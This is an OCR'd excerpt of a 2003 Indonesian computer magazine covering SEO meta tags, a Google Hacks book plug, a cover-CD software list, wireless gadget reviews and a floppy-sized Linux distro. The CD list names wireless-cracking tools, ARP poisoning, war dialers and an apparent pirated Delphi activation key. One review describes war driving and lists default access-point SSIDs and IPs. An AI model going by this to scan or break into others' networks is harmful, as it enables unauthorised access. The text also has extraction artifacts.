Untuk mengetahu keyword- keyword yang tepat, sebuahanalisis keyword mungkin akan berguna. Hal ini di antara-nya dapat dilakukan dengan memasang search engine lokal(khusus untuk situs kita) yang dapat merekam dan mela-porkan keyword-keyword apa saja yang telah diketikkanpengunjung. Layanan gratis dari FreeFind (www.freefind.com)layak dicoba untuk memahami hal ini. Namun, sekali lagi,

keyword yang ingin Anda tambahkan pada meta keywords juga harus terdapat pada <body></body>; jadi, jangansekadar menambahkannya dengan keyword-keyword hasillaporan dari FreeFind.

Akhirnya, perlu ditegaskan bahwa maksud utama meta key-words adalah agar user dapat dengan segera menemukandengan tepat informasi yang ingin ia temukan; bukan secaralangsung untuk meningkatkan ranking sebuah situs.

Meta PICS-LabelSintaks meta PICS-Label

<meta http-equiv="PICS-Label" content="..." />

Meta PICS-Label (PICS = Platform for Internet Content

Selection) adalah sebuah protokol yang mengenali suatusistem pe-rating-an yang didasarkan atas isi informasi sebuahsitus, seperti: aman bagi anak-anak, aman untuk umum, amanuntuk orang dewasa, dsb.Sampai saat ini PICS baru browserInternet Explorer yang menerapkan sistem ini, yaitu orangtua dapat mengatur isi situs yang bagaimana yang dapat di-akses oleh browser tsb untuk kepentingan anak-anaknya. Satudi antara yang mengadakan sistem pe-rating-an ini adalahSafeSurf . Untuk mengetahui lebih lengkap apa itu PICS-Labeldan SafeSurf, silakan kunjungi http://safesurf.com/ssfaq.htm.

Pada prinsipnya, kita dipersilakan me-rating sendiri (tentunyadengan jujur) situs kita pada http://safesurf.com/classify/,kemudian kita akan menerima e-mail pemberitahuan melaluie-mail untuk mencantumkan sebuah meta tag untuk memberilabel terhadap situs kita (cukup sekali pada <head></head>dari index.html) sesuai dengan rating-nya.

Misalnya:<meta http-equiv="Certification"content='"http://www.ufcws.org/license.html" l r truecomment "United Federation of ChildSafe Web Sites" for"http://situs-anda.com" on "2003.02.10" r"'>

Menariknya, kita dapat mendaftarkan URL situs Anda padadirektori khusus untuk situs-situs yang telah diberi label inipada http://www.surfsafely.com/urladd.html . Ada direktoriuntuk situs-situs bisnis, hiburan, literatur, belanja, pendidik-an, olah raga, keluarga, keuangan, komputer, dsb—sesuaikandengan tema situs kita. Paling lambat dua minggu setelahdidaftarkan, situs kita sudah dapat di-search pada direktori tsb(http://surfsafely.com/directory/ ). Hasil retrieval-nya adalahberupa judul dan deskripsi situs kita yang diambil dari metadescription situs kita.

Karena SurfSafely sangat menjaga kualitas direktorinya, makadalam hal promosi situs, tercantumnya link situs kita pada di-rektori SurfSafely dapat meningkatkan relevansi situs kita, danini akan mempengaruhi link analysis yang digunakan olehsearch engine sekarang ini untuk menentukan ranking. Linkanalysis itu sendiri adalah suatu algoritma baru (yang cukuppenting) yang digunakan oleh search engine seperti Googleuntuk menentukan relevansi sebuah situs dengan tema ter-tentu, yaitu dengan menganalisis bagaimana situs kita di-linkoleh halaman situs lain yang temanya berhubungan dengansitus kita. Link analysis adalah bagian dari faktor "off the page"yang akan menentukan ranking situs kita,namun tidak mudahkita kontrol (Bandingkan dengan faktor "on the page" sepertiorganisasi content,penulisan title dan meta tag, dsb,yangdapat kita kontrol setiap saat).

Meta RobotsSeperti yang telah disebutkan pada awal uraian ini, metarobots adalah meta tag yang paling didukung oleh sebagianbesar search engine.

Sintaks meta robots:

<meta name="robots" content="Value" />

Value dari content ini bisa berupa:

indexArtinya: isi dari halaman web (web page) tersebut dimasukkanke dalam index oleh spider, sehingga seluruh isi dari halamanweb ini bisa ditemukan melalui pencarian dari search engine.

follow

Artinya: semua link ( <a href="…"></a> ) akan ditelusurioleh spider.

NeoStyle

42 NeoTek Mei/Jun 2003

• http://travelforum.org/bali/ tercantum pada salah satu direktori SafeSurf, karena itu dapat muncul hasil retrieval dengan keyword "bali lombok

travel". http://travelforum.org/bali/ muncul juga di ranking keempat pada hasil retrieval Google dengan keyword yang sama. Link analysis dapat 

 mempengaruhi ranking pada Google.

Page 44: Neotek Vol. III - No. 08

8/9/2019 Neotek Vol. III - No. 08

http://slidepdf.com/reader/full/neotek-vol-iii-no-08 44/50

noindexArtinya: spider tidak memasukkan seluruh informasi yangterdapat pada halaman web tersebut ke dalam index, tetapitetap menelusuri semua link yang ada di dalamnya.

nofollowArtinya: spider tidak menelusuri semua link yang terdapatpada seluruh halaman web tersebut, tetapi tetap memasukkanseluruh informasi yang ada halaman tsb ke dalam index.

Catatan: index dan follow adalah nilai default untuk metarobots, artinya inilah yang akan dikerjakan oleh spider mes-kipun tidak ada meta robots sama sekali: spider selalu ber-usaha memasukkan semua informasi dari semua halamandalam sebuah situs untuk dimasukkan ke dalam index.

Jadi meta robots bermanfaat apabila kita ingin agar halaman-halaman tertentu dalam situs kita tidak dapat diketahui keber-adaanya oleh user lain melalui search engine (tidak dapat di-search). Tiap-tiap halaman yang demikian itu harus ditam-bahkan kode berikut dalam tag <head></head>-nya:

<meta name="robots" content="noindex" />

Ada satu Value lagi yaitu noarchive. Search engine seperti

Google menyimpan informasi sebuah halaman ke dalamcache-nya, di samping dalam index-nya, yang bisa dibukadengan meng-klik link Cached pada setiap hasil retrieval.Tu- juannya, sebagai antisipasi, bila server situs dari halaman webyang bersangkutan tidak aktif sementara,user masih bisa me-lihat isi halaman web tersebut dengan meng-klik link Cached.Apabila kita tidak menginginkan adanya cached version ini,tuliskan noarchive pada meta robots.Namun demikian, snippetyang sesungguhnya merupakan bagian dari cached versiontetap akan tetap muncul pada hasil retrieval.

Kita dapat menggabungkan noindex dengan noarchivedengan menambahkan tanda koma dan satu spasi, sbb:

<meta name="robots" content="noindex, noarchive" />

Kode di atas sama dengan:<meta name="robots" content="noindex, noarchive, follow" />

Penutup

Segala usaha kita dalam menambahkan atau pun memper-baiki meta tag yang sudah ada baru efektif setelah kita men-daftarkan situs kita pada search engine ( misal, pada Google:http://www.google.com/addurl.html ) atau setelah masakunjungan spider berikutnya.

Bahwa meta tag bukan menjadi satu-satunya faktor untukmenentukan ranking sebuah situs, telah kita maklumi, karenameta tag sebenarnya ditujukan untuk meningkatkan akses-ibilitas dan usabilitas sebuah situs dengan menyajikan infor-

masi yang akurat mengenai isi sebuah situs kepada searchengine.

Andrew Goodman, editor pada Traffick.com, boleh membuatkita heboh dengan menyatakan "berakhir"-nya meta tag(baca ,"An End to Metatags",www.traffick.com/article.asp?aID=102 );namun perlu dipertanyakan sekali lagi, meta tag yang bagai-mana yang dianggapnya berakhir atau "mati" (meminjamistilah Danny Sullivan, editor Searchenginewatch.com)?Dengan uraian di atas, Anda dapat menjawabnya sendiri.

 Juneman Abraham adalah pengajar padahttp://www.webmastercertification.web.id/ dan dapatdihubungi lewat email di [email protected]

NeoStyle

Mei/Jun 2003 NeoTek 43

ukan cuma komputer atau jaringan bisa di-hack, searchengine seperti Google juga

bisa di-hack dan pihak Google se-

ndiri mendukung usaha meng-hackGoofle. Meng-hack Google di siniartinya mengutak-utik Google agarkita dapat semakin meningkatkanpemanfaatannya. O’Reilly menjadipenerbit pertama yang membahas

cara meng-hack search engine yang paling populer ini. Bagiyang tidak memiliki bukunya, O’Reilly membuka sedikitbeberapa tip meng-hack Google lewat situsnya:

http://hacks.oreilly.com/pub/ht/2

Ada 100 hack tip dalam buku ini yang dibagi atas:

• Searching Google• Google Special Services and Collections• Third-Party Google Services• Non-API Google Applications• Introducing the Google Web API• Google Web API Applications• Google Pranks and Games• The Webmaster Side of Google

Pada setiap bagian dibuka satu tip (kalau mau tahu semuanyaharus membeli bukunya),yaitu:

Hack #5 Getting Around the 10 Word LimitThere are some clever ways around Google'slimit of 10 words to a query

Hack #17 Consulting the Phonebook

Google makes an excellent phonebook, even tothe extent of doing reverse lookups.

Hack #32 Google NewsReading the latest news across myriad sourcesusing Google News.

Hack #44 Scraping Google ResultsScraping the results of a Google search into acomma-delimited file.

Hack #54 NoXML, Another SOAP::Lite AlternativeNoXML is a regular expressions-based, XMLParser-free drop-in alternative to SOAP::Lite

Hack #79 Measuring Google Mindshare

Measure the Google mindshare of a particularperson within a query domain.

Hack #87 Google WhackingWith over 2 billion pages in its index, is itpossible to get only one result for a search?

Hack #100 Removing Your Materials from GoogleHow to remove your content from Google'svarious web properties.

Utak-utik GoogleUtak-utik GooglePOPOWWEER SR SEEARARCCHH

B

Google HacksBy Tara Calishain, Rael DornfestFebruary 2003Series: Hacks0-596-00447-8, Order Number: 4478352 pages, $24.95 US, $38.95 CA, £17.50 UK

Page 45: Neotek Vol. III - No. 08

8/9/2019 Neotek Vol. III - No. 08

http://slidepdf.com/reader/full/neotek-vol-iii-no-08 45/50

44 NeoTek Mei/Jun 2003

NeoRagam

daftar isidaftar isi

cd neotekcd neotek

AdvancAdvanced Linux Ped Linux Pockocketbook 2003etbook 2003

E-BOOK 

Advanced Linux Pocketbook 2003ALPB2003.pdf 

Hackproofing Your Web Applicationebook.htm

 WIRELESS HACKINGAirJack 0.6.2 airjack-v0.6.2-alpha.tar.gzAiroPeek Demo apwdemo.exeAiroPeek NX Demo apwnxdemo.exeAirSnort Airsnort-0.2.1a.tar.gzARP Poisoning arppoison.zipCENiffer ARM Processor CEnifferARM.zipCENiffer MIPS Processor CEnifferMIPS.zipCENiffer SH3 Processor CEnifferSH3.zipFake AP fakeap-0.3.1.tar.gzKismet kismet-2.8.1.tar.gzMiniStumbler MiniStumbler_0_3_23.zipNetwork Stumbler Win NetStumblerInstaller_0_3_30.exevx FTP vxFtp.zipvx FTP Server vxFtpSrv.zipvx HPC vxHpc.zipvx IP Config vxIPConfig.zipvx Sniffer vxSniffer.zipvx TFTP Server vxTftpSrv.zipvx Utilities vxUtil.zipvx Web vxWeb.zip

 WAR DIALER Blue Beep bluebeep.zipBlue Dial bdial62.zipPBX Scanner pbx_scan.zipPhone Tag phonetag.zipSwitch Board switch.zipTelix for DOS telix351.zipTelix for Windows setup.exeTHC-Scan thc-ts20.zipToneLoc tl110.zipToneLoc Utilities toneutil.zip

GAMEMutant Storm mutantstorm_demo.exeJurassic Park (Demo) jpgenesis_demo.exeRoller Coaster Tycoon 2 RCT2Demo.zip

 WINDOWS SECURITY MBSA mbsasetup.exePoledit for Windows 95 poledit95.zipPoledit for Windows 98 poledit98.zipWindows Installer 2.0 (NT) InstMSiW.exe

REGISTRY TOOL (FULL VERSION)RegCrawler 3.0 rc30.zipRegHealer 2.32 rhset_apc.exe

Tweak XP 2.17 tweakxp_apc.exeDELPHI WORKSHOPDelphi 7 Personal Edition Install.exeDelphi 7 Activation Key reg119.txtTweakid Project PTweakid.dpr

NOKIA UTILITIESPC Suite for Nokia 6510 Nokia_PC_Suite_4.51a.exeModem Setup 6510 Modem_Setup_for_Nokia_6510.exePC Suite for Nokia 7250 Nokia_PC_Suite_51_en.exeModem Driver 7250 Cable Nokia_7250_Cable-driverModem Driver 7250 IrDA1 Nokia_7250_IrDA_2000_XPModem Driver 7250 IrDA2 Nokia_7250_IrDA_95SE_ME

LINUX DISTROXnuxer Linux xnuxer-linux.zip

PROJECT/WORKSHOPsrv32, srv32d, e xedll readme.txtMySecure HTM MySecure.htm

AMKMAdnan Zain

MuLinux mulinux-13r2.zipAndrew BASP to PHP Linux asp2php-0.75.17.tar.gzASP to PHP Windows jaguarAsp2Php0.2.7.sea.zipASP to PHP Mac jaguarAsp2Php0.2.7.sea.sitPHP Nuke 6 PHP-Nuke-6.0.tar.gzWdasm 32 wdasm893.zipDreamweaver Extension (24 groups)FirnandRemote Scope Demo RemoteScopeConsoleDemo.exeRheesal HendraChampionship Manager 1 setup.exeChampionship Manager 93-94 setup9394.exeChampionship Manager Italia setupcmitalia.exeCM 1 Data Editor cm1preed.zipChampionship Manager 2 (24 files)

WajaFineCrypt 7.1 fcinst.exePicture Man 4.2 Trial picman42.zipWijiRead please 2003 setupreadplease2003.exeYossyAVSim+80 Demo avs80.exe

Proteksi terbaik untuk sistem komputer anda dari seranganvirus. Dapatkan Harga spesial hanya dari 17$.Hubung Budi Kurniawanemail:[email protected], Hp: 08129512648

eBook ini adalah lanjutan darieBook sebelumnya yang dise-diakan pada CD NeoTek III/5Feb?Mar 2003.

Advanced Linux Pocketbook2003 memulai bahasan denganinstalasi Linux Debian yangdilanjutkan dengan cara mena-ngani hardware, pembahasan

networking pada Linux, dansecurity practice pada Linux.

Dua tiga bab terakhir lebihmerupakan penutup: Maxi-mizing Linux,DevelopingLinux, dan Helping the Cause.

Ingin menangani Linuxdengan benar? Pakai distroDebian dan baca eBook ini.

Page 46: Neotek Vol. III - No. 08

8/9/2019 Neotek Vol. III - No. 08

http://slidepdf.com/reader/full/neotek-vol-iii-no-08 46/50

Mei/Jun 2003 NeoTek 45

Ada beberapa opsi wireless. Untuk handphone dikenal sebagai GPRS dan (kelak) 3G,sedangkan untuk komputer dan PDA dikenal sebagai Wi-Fi. Kita mulai bahasan kita dengan

handphone GPRS yang kini sedang marak-maraknya serta pemanfaatannya bersama PC.

AHWA MANUSIA ADA-lah makhluk sosialterlihat dari besar-

nya minat terhadap alat un-tuk berkomunikasi. Pada pe-ringkat pertama adalah te-lepon seluler yang jelas besarmanfaatnya serta terjangkauharganya. Apalagi dengansemakin banyaknya hand-phone second hand serta

paket kartu GSM prabayar.Pada tingkat dasar ini salahsatu daya tarik terbesar GSMadalah kemampuan mengi-rim dan menerima SMS(short messages system).

Sedikit meningkat adalahfasilitas GPRS (GSM PacketRadio Service) yaitu perlu-asan dari GSM yang me-mungkinkan pelanggan me-manfaatkan transmisi datakecepatan tinggi.

Teknologi GPRS memung-kinkan handphone diguna-kan sebagai piranti untuk

mengirim atau menerimadata pada network berbasisprotokol internet.Aplikasiyang dapat memanfaatkanGPRS adalah WAP, MMS,SMS, Java, dan PC Dial-up(misalnya Internet browsÿÿÿing dan e-mail).

Telepon genggam GPRS kinibukanlah barang aneh lagi.Khusus untuk Nokia di anta-

ranya adalah model:3510,3510i, 3650, 5100, 6100, 6310,6310i, 6510, 6610, 6800, 7210,7250,7650, 8310, 8910, 8910i.

Adanya fasilitas GPRS mem-buat telepon genggam yangbersangkutan dapat meman-faatkan semua fasilitas yangterdapat pada Nokia PC Suite,khususnya feature sinkroni-sasi calendar, address book, to-do-list,dan email dari Out-look, Outlook Express, Lotus

Notes, atau email client lain-nya. Selaitu itu, handphoneGPRS juga dapat dijadikanmodem untuk laptop.

Berikut adalah contoh tampil-an PC Suite untuk Nokia 6510yang mencakup fasilitas:

• Nokia Content Copier• Nokia PC Composer• Nokia PC Graphics• Nokia PC Sync• Nokia PC Wap Manager• Nokia Phone Editor.

Nokia PC Suite yang berbe-

da tersedia untuk masing-masing GPRS phone padadaftar di atas kecuali tipe3510 dan 3510i yang tidakmendukung sinkronisasi.

Selain dapat melakukan sin-kronisasi dengan PC, dapat

 juga dijadikan modem un-tuk PC/laptop tersebut.

Perangkat minimal seorangstreet warrior dengan demi-kian adalah laptop dan salahsatu tipe handphone GPRS

di atas (kecuali tipe 3510dan 3510i).

B

NeoReview

Kapan Saja, Dimana SajaKapan Saja, Dimana Saja

STRSTREEEETT  W W AR ARRRIORIOR GADGGADGEETT

Selalu On-Line LSelalu On-Line Lee wat Wireless Connection wat Wireless Connection

Go Wireless dengan GGo Wireless dengan GPPRRS/LaptopS/Laptop

 Setelah di-install, Nokia PC Suite terdapat pada Start Menu. Pada suite ini terdapat berbagai fungsi denganfungsi  Sync hro ni  zat  io n dan WAP Manage r  yang paling relevan dengan fungsi wireless.

Nokia 6510 salah sati 

 handphoneNokia yang

GPRSenabled dan mendukung sinkronisasi.

Page 47: Neotek Vol. III - No. 08

8/9/2019 Neotek Vol. III - No. 08

http://slidepdf.com/reader/full/neotek-vol-iii-no-08 47/50

NeoReview

46 NeoTek Mei/Jun 2003

Go Wireless dengan Wi-Fi/LaptopGo Wireless dengan Wi-Fi/Laptop

ERNYATA URUSAN

kompatibel untukwireless NIC pada

dasarnya tidak menjadi ma-salah sejauh anda menggu-nakan WNIC itu untuk:

• berasosiasi (terhubung)dengan access point.

• membentuk ad-hocnetwork dengan komputerlain tanpa menyertakanaccess point

Namun urusannya menjadiberbeda apabila anda hendakmenggunakan WNIC andauntuk war driving. Softwarewar driving utama, yaituNetStumbler hanyamendukung beberapa jenisWNIC saja, khususnya yang

secara ketat Wi-Fi compliant.Untuk war driving,WNICcard yang pasti bisa diguna-kan (dan relatif mudah dida-pat di pasaran) adalah:

• ORiNOCO Silver/Gold

• Avaya Silver/Gold

Silver artinya menggunakanenkripsi WEP 64-bit, sedang-kan Gold menggunakan en-kripsi WEP 128-bit.

WNIC merk lain yang

didukung oleh NetStumblerdi antaranya:

• Dell TrueMobile 1150

• Toshiba 802.11b wirelesscard

• Compaq WL110

• Cabletron Roamabout

• ELSA AirLancer

• ARtem ComCard

• 1stWave 1ST-PC-DSS11

• Buffalo Airstation WLI-

PCM-L11Wireless NIC lain yang po-puler di pasaran seperti dariLinkSys, D-Link, Netgear,

SMC, Senao, Planet, dan la-innya memang lebih murah(hampir separuh harga merk-merk utama di atas), tetapirata-rata tidak dikenali olehNetStumbler.

Yang menjadi masalah diIndonesia adalah belum ba-nyaknya hot spot atau titik-titik access point untukumum di Indonesia. Mung-kin untuk koridor perkantor-an Thamrin-Sudirman agakberbeda.

Di Singapore dengan tingkatpemakaian broadband yangtinggi,pemakaian access pointyang populer, serta kepadat-an penduduk (sebagian besartinggal di apartemen), amat

mudah menbdapatkan hotspot. Bahkan hanya denganmenggunakan WNIC saja,tanpa ditambah dengan an-tena eksternal.

Di Indonesia pada umumnyapenerapan wireless LAN pa-da umumnya selalu me-nyertakan antena eksternal.Bahkan antena eksternal se-lalu menjadi bahasan pentingsejak awal pembahasan wire-less LAN (perhatikan artikel-artikel Onno W. Purbo) yangsangat menekankan pen-tingnya pemakaian antenaeksternal.

Antena eksternal untuk wire-less NIC bukanlah bendayang terlalu aneh juga.Apa-bila memahami prinsip-prin-sip antena, maka antena eks-ternal WNIC dapat dibuatsendiri, seperti yang dilaku-kan oleh Judhi Prasetyodengan antena kalengnya.

Pada WNIC ORiNOCO atauAvaya, sudah terdapat ko-nektor untuk dihubungkandengan antena eksternal.

Ada dua jenis antena ekster-

nal yang lazim digunakandalam wireless network: om-nidirectional dan directional.

Antena omnidirectionalmenghasilkan pancaran ke

segala arah, sedangkan an-tena directional hanya kesatu arah saja. Bayangkanseperti membandingkanlampu pijar dengan senter..

Beberapa jenis antena dibawah ini dapat dipertim-bangkan sebagai antenaeksternal:

HyperLink HG2415Y(USD105)www.hyperlinktech.com

Antena yagi (directional)dengan kinerja yang kuat.

Signull SMISMCO10(USD120)www.signull.com

Omnidi-rectional

antennayang di-rancanguntuklongrangemultipointapplica-tion.

Signull SMISMCY12(USD155)www.signull.com

Circular yagi antennadengan kinerja yang baik.

Ada banyak sekali pabrikanaccess point dan semuanyamenyajikan fungsi yangsama. Perbedaan utamanyaadalah dalam hal security.

Linksys kini sangat populermengingat harganya yangekonomis, mudah didapatserta serta adanya fungsisecurity yang cukup baik,yaitu MAC restriction dan

beacon turn-off capability.Linksys WAP11 (SGD199)www.linksys.com

default SSID Linksysdefault IP 192.168.1.250default chan. 6Encryption 40/128-bitClients 32NetGear ME102 (SGD199)www.netgear.com

default SSID Wirelessdefault IP 192.168.0.5default chan. 6

Encryption 40/128-bitClients 32SMC 2655W (SGD199)www.smc.com

default SSID MiniAPdefault IP 192.168.2.50default chan. 1Encryption 40/128-bitClients 32

Yang dimaksud dengan Wi-Fi (wireless fidelity) adalah spesifikasi802.11a dan 802.11b yang memenuhi syarat

Wireless Ethernet Compatibility Alliance (WECA)yang artinya perangkat anda dapat berkomunikasi dengan produk wirelessLAN lain yang IEEE 802.11 compliant. Dalam bahasa mudahnya,

perangkat wireless anda kompatibel dengan yang lain.

ANTENA EKSTERNAL

ACCESS POINT

SMISMCO10

HG2415Y

SMISMCY12

T

SGD188

Page 48: Neotek Vol. III - No. 08

8/9/2019 Neotek Vol. III - No. 08

http://slidepdf.com/reader/full/neotek-vol-iii-no-08 48/50

NeoReview

Mei/Jun 2003 NeoTek 47

Go Wireless dengan PGo Wireless dengan Pocket PCocket PC

AHWA IPAQ ADALAH STANDAR

de facto untuk wireless PDAterlihat dari berbagai soft-

ware wireless yang selalu menyedia-kan versi untuk iPAQ seperti misal-nya, induk segala war driving soft-ware, NetStumbler, yang juga me-nyediakan versi untuk iPAQ, yaitu

MiniStumbler.Untuk menjalankan wireless net-working pada PDA, maka pada PDAharus terpasang wireless networkinterface card (WNIC) yang biasanyalewat CF Type II slot atau pada duamodel yang dibahas ini sudah ter-integrasi di dalamnya.

Sebenarnya untuk war driving selainmenggunakan NetStumber (Windows)atau MiniStumbler (Pocket PC) dapat

 juga menggunakan Kismet yang ber- jalan pada mesin Linux (baik yangdesktop maupun Linux PDA sepertiSharp Zaurus).

Memang penggunaan Kismet tidaksemudah NetStumbler atau MiniStumbler, khususnya untuk andayang belum terbiasa dengan Linux.

Untuk wireless communication handheld device yang mendominasi adalah Pocket PC dengansistem operasi Microsoft Pocket PC 2002 dengan product leader-nya Compaq iPAQ.

Tapi kini iPAQ mulai disaingi oleh merk-merk lain seperti Fujitsu, Toshiba, dan Dell.NeoTek memilih dua wireless PDA yang patut dipertimbangkan:Compaq iPAQ 5450 dan Toshiba Pocket PC e740.

B

Ki  smet  berjalan pada Sharp Zaur us 5500(Gambar 1 dan 2) serta Min iSt umbe r 

 berjalan pada iP  AQ P ocket PC 

(Gambar 3 dan 4)

FITUR  FUJITSU LOOX 600 HP IPAQ H5450 DELL AXIM X5 TOSHIBA E740

1

32

4

Sistem operasi MS Pocket PC 2002 MS Pocket PC 2002 MS PocketPC 2002 MS PocketPC 2002

Prosesor XScale 400 MHz XScale 400 MHz XScale 400 MHz XScale 400 MHz

Dimensi 130 x 77 x 17.5 mm 138 x 84 x 15.9 mm 128 x 81.5 x 18 mm 125 x 80 x 16 mm

Berat 175 g 206 g 196 g 285 g

Layar TFT LCD TFT LCD TFT LCD TFT LCD

Resolusi 240 x 320 pixel 240 x 320 pixel 240 x 320 pixel 240 x 320 pixelJumlah warna 65.536 (16 bit) 65.536 (16 bit) 65.536 (16 bit) 65.536 (16 bit)

Touch screen ya ya ya ya

RAM 64 MB 64 MB 64 MB 64 MB

ROM 32 MB 48 MB 48 MB 32 MB

Metode input handwriting, soft handwriting, soft handwriting, soft handwriting, softkeyboard, voice keyboard, voice keyboard, voice keyboard, voice

Komunikasi IrDA, USB IrDA, USB IrDA, USB IrDA, USBintegrated bluetooth integrated bluetooth bluetooth (via CF) bluetooth (via SD card)

integrated Wi-Fi  Wi-Fi (via CF) integrated Wi-Fi

Expansion s lot CF Type I I, SD/MMC SD, Output exp. CF Type I I, SD card CF Type I I, SD/MMC

Included devices Docking cradle, Docking cradle, Docking cradle, Docking cradle,stylus, DC adapter stylus, DC adapter stylus, DC adapter stylus, DC adapter

Sound speaker, mic, jack speaker, mic. jack speaker, mic, jack speaker, mic, jack voice rec., aud. out voice rec. aud. out voice rec., aud. out voice rec., aud. out

Baterai 1400mAh Lith.pol. Lith. ion 1440mAh Lith-ion Lith. ionFitur khusus — biometrics, enkripsi Wi-Fi optional Expansionpack:

 VGA output, USB portfor keyboard

Harga SGD 959 SGD 1199 Mulai dari SGD 419 SGD 888

Page 49: Neotek Vol. III - No. 08

8/9/2019 Neotek Vol. III - No. 08

http://slidepdf.com/reader/full/neotek-vol-iii-no-08 49/50

48 NeoTek Mei/Jun 2003

asa penasaran dan ingin tahu! Setidaknya itulahyang mendorong penulis untuk membuat distroLinux yang dapat dikemas dalam satu buah disket

berukuran 1,44 MB. Keingintahuan untuk bisa membuatminidistro Linux ini semakin kuat ketika penulis membacabeberapa site project minidistro seperti Small linux, LRP(Linux Router Project) dengan kemampuan sebagai router,dan Mulinux yang mampu menjalankan X-Windows dari

disket dengan memanfaatkan RAM disk.Distro Xnuxer Linux ini dikerjakan selama lima hari di saat-saat waktu senggang penulis. Tidak ada yang istimewa padadistro ini kecuali ukurannya yang kecil karena bisa dikemasdi dalam disket serta dukungan aplikasi network umumyang disertakan dalam distro.

Tujuan dibuatnya distro Xnuxer Linux adalah untuk lebihmemperkenalkan operating system linux kepada para peng-gemar komputer pada umumnya dan kepada penggemarLinux/nix pada khususnya.

Dari pengamatan penulis, sebenarnya sebenarnya yang ter-tarik dengan operating system Linux dan kebanyakan me-reka merasa terhambat, karena untuk kategori pemula dan

baru mengenal Linux, masih dirasa sulit untuk melakukanproses instalasi Linux apalagi ketika harus membagi partisidi hard disk. Distro disket sangat cocok untuk para pemulayang ingin belajar perintah-perintah di Linux tanpa perluterlibat dengan proses instalasi yang rumit.

Ada beberapa kendala yang penulis hadapi ketika membuatdistro Xnuxer Linux. Yang pertama tentunya penulis harusmemperhitungkan agar ukuran distro yang dibuat tidak me-lebihi 1440 Kb yang artinya perlu dilakukan konfigurasikernel yang seminimal mungkin. Kendala yang kedua adalahPenulis harus menentukan beberapa dukungan file systemyang seminimal mungkin juga agar ukurannya tidak mele-bihi batas ukuran disket.

Dari hasil percobaan dengan menggunakan Trustix SecureLinux dengan kernel 2.2-19, penulis melakukan konfigurasikernel hampir kurang lebih 10 kali untuk mendapatkan ukur-an kernel sesuai dengan yang diinginkan.

Idealnya untuk minidistro yang dikemas dalam disket, ukurankernel adalah di bawah 400 Kb, tapi dari awal penulis bertekadbahwa walaupun distro dibuat dalam disket, kinerja tetapdipertimbangkan dan merupakan keinginan penulis untukmelengkapi distro Xnuxer Linux dengan kemampuan jaringan/network yaitu dengan melengkapi distro dengan beberapadukungan protokol socket seperti UDP, TCP, dan ICMP meskidengan konfigurasi minimal.

Dari hasil akhir kompilasi kernel yang penulis lakukan diper-oleh kernel dengan ukuran 498 Kb. Ukuran kernel ini sudahdilengkapi beberapa dukungan hardware dan beberapa formatfile system di antaranya:

• Support untuk seluruh jenis prosesor 386, 486, 586,dan 686• Support modules, PCI architecture, dan mouse• Support IDE device (floppy disk,hard disk, CD)• Support RAM drive• Support network dengan konfigurasi minimal• Support protocol socket TCP, UDP, ICMP• Support untuk beberapa jenis file system

(FAT/FAT32,NTFS,EXT2)• Support LAN card/Ethernet base 10/100 dan 3Com

Di kernel yang penulis buat memang tidak disertakan du-kungan terhadap hardware SCSI yang notabene banyak dipakai pada PC model lama. Ini dengan pertimbangan agarukuran kernel tidak lebih besar dari ukuran maksimal yangtelah di tentukan. Penggunaan RAM drive menjadi sangatpenting untuk memaksimalkan kerja kernel dan disini penu-lis telah mengkonfigurasi kernel agar membuat RAM disksebesar 4 MB.

Instalasi Xnuxer Linux ke Disket

Di dalam paket instalasi Xnuxer Linux setidaknya ada bebe-

rapa file di dalamnya yaitu rawritewin.exe, xnuxer.img, danfile README.txt yang seluruhnya berukuran sekitar 1,6 Mb.

Untuk Pemakai WindowsUntuk Anda pemakai Windows,Anda bisa menginstalasiXnuxer Linux ke disket menggunakan rawritewin.exe de-ngan langkah-langkah sbb:

1. Jalankan rawritewin.exe di Windows Anda.

2. Pilih image linux dengan menekan tombol browse danpilih image dengan nama file xnuxer.img

3. Tekan tombol write di rawritewin.exe dan tunggu hinggaproses selesai.

4. Reboot PC Anda dan atur agar BIOS booting dari drive A:

5. Selanjutnya tunggu proses booting selesai dan prompt

login muncul.6. Gunakan login 'root' atau 'xnuxer' untuk masuk ke

dalam sistem.

Distro Linux Satu DiskDistro Linux Satu DisketetDani Firmansyah ([email protected]) melangkah lebih jauh dalam dunia Teknologi Informasi.

Bukan sekedar menjadi pemakai, kini sudah bisa menjadi packager dengan membuat distro-nyasendiri Xnuxer Linux. Apa kelebihan dan keterbatasannya?

R

XNXN UUX X EER LIR LI NNUUX X 

NeoReview

Page 50: Neotek Vol. III - No. 08

8/9/2019 Neotek Vol. III - No. 08

http://slidepdf.com/reader/full/neotek-vol-iii-no-08 50/50

NeoReview

Untuk Pemakai Linux

Bagi Anda yang akan menginstalasi Xnuxer Linux dari ope-rating sistem Linux Anda gunakan program dd (progam copydan convert file, default di Linux) seperti contoh berikut ini:

1. Gunakan program DD (copy and convert file) denganmenjalankan perintah sbb:

dd if=xnuxer.img of =/dev/fd0 bs=1k seek=02. Tunggu hingga proses duplikasi image selesai.

3. Reboot PC Anda dan atur agar bios booting dari drive A:

4. Selanjutnya tunggu proses booting selesai dan promptlogin muncul.

5. Gunakan login 'root' atau 'xnuxer' untuk masuk kedalam sistem.

File System, Mouse, dan Network 

Dalam penyiapan kernal yang juga perlu diperhatikan adalahmengatur dukungan file system dan beberapa file konfigurasi.Sebagian besar file system diletakkan di direktori /bin dan

/sbin, tentu hal ini membuat penulis sedikit mengerenyitkandahi karena harus memikirkan bagaimana agar image filesystem yang dibuat tidak terlalu besar. Akhirnya jalan yangditempuh adalah melengkapi file system berformat AOUTbinary format yang ukurannya lebih kecil dibandingkandengan file sistem berformat ELF binary format. Dukunganmouse juga disertakan di distro ini; setidaknya ada tiga jenismouse yang di-support oleh kernel yaitu:

1.Logitech Mouse2.Microsoft Mouse3.PS/2 Mouse

Untuk uji coba mouse,Anda yang menggunakan serial

mouse bisa menjalankan command sebagai berikut ketikasudah login di Xnuxer Linux.

/usr/bin/gpm -t bare

Untuk Anda yang menggunakan mouse jenis PS/2 silahkan jalankan command berikut dari prompt Xnuxer Linux:

gpm -k > /dev/nullgpm -m /dev/psaux -t ps2 -r 30 > /dev/null

Setelah command di atas mudah-mudahan mouse Andasudah bisa digunakan.

Di distro ini penulis memang tidak menyertakan beberapamodul network card dengan pertimbangan agar ukuranimage file system tidak terlalu besar. Tapi jangan khawatir,

